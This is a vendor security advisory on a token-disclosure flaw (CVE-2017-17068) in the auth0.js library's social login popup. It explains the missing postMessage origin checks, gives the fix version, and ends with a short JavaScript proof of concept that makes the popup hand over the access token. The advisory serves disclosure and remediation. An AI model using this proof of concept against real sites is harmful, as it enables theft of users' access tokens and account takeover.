AppCheck discovered a security flaw within the auth0.js JavaScript library that could be exploited by a malicious website to read sensitive access tokens cross-domain.

About Auth0

Auth0 provides authentication solutions for a variety of platforms including the ability to integrate social media authentication into an application.

“We solve the most complex identity use cases with an extensible and easy to integrate platform that secures billions of logins every month” – https://auth0.com/

Token Disclosure Vulnerability

AppCheck identified a security flaw within the Social Media authentication flow employed by the auth0.js client library. In brief, the following authentication flow is followed when authenticating via Facebook or Google using auth0.js :

• User selects to authenticate via Facebook and triggers a pop-up window to the Facebook login flow.
• The Facebook OAuth authentication process is completed and an access token is generated.
• The pop-up window passes the access token back to the requesting site using HTML5 postMessage. This token is then used to authenticate the user.

A vulnerability occurs since the origin and target of postMessage events between the pop-up window and the requesting page are not validated. i.e. Message event handlers will process messages from, and reply to, any website that submits the event. It is therefore possible for a malicious web page to open a pop-up for an authenticated user and intercept the sensitive access token. The attacker could use the token to then carry out actions on behalf of the user or read sensitive user information.

Detecting the Vulnerability

AppCheck was able to detect this security flaw without any specific updates, reporting the vulnerability as “HTML5 postMessage information disclosure”. However, a specific plugin has been added to properly categorise the vulnerability to aid in remediation:

Resolving the Vulnerability

Developers using the auth0.js library need to upgrade to the latest version: 8.12.

Further details can be found on the vendors official website:

https://auth0.com/docs/security/bulletins/cve-2017-17068

Proof of Concept

The following Proof of Concept JavaScript can be used to demonstrate the vulnerability. The auth_url variable should be populated with the pop-up URL used in the target authentication flow

<script> function request_token(event){ // when message is recieved send request back a request for the access_token data = JSON.parse(event.data) if (data.a ==”ready”){ window.poc.postMessage(‘{“a”:”request”}’, ‘*’); }else{ alert(JSON.stringify(data)); } } function popup(){ var auth_url = “https://<target URL>/authorize?client_id=<client_id>&response_type=token&connection=facebook….” window.poc = window.open(auth_url); } window.addEventListener(“message”, request_token) </script>